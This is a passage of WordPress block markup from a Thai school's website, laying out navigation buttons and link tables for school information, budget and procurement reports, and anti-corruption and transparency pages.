ol.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1314,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/1.png\" alt=\"\" class=\"wp-image-1314\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1315,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/06/2.png\" alt=\"\" class=\"wp-image-1315\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"54d1190a\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้างและอำนาจหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</td></tr><tr><td>แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td>ข้อมูลเชิงสถิติการให้บริการ</td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</td></tr><tr><td>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 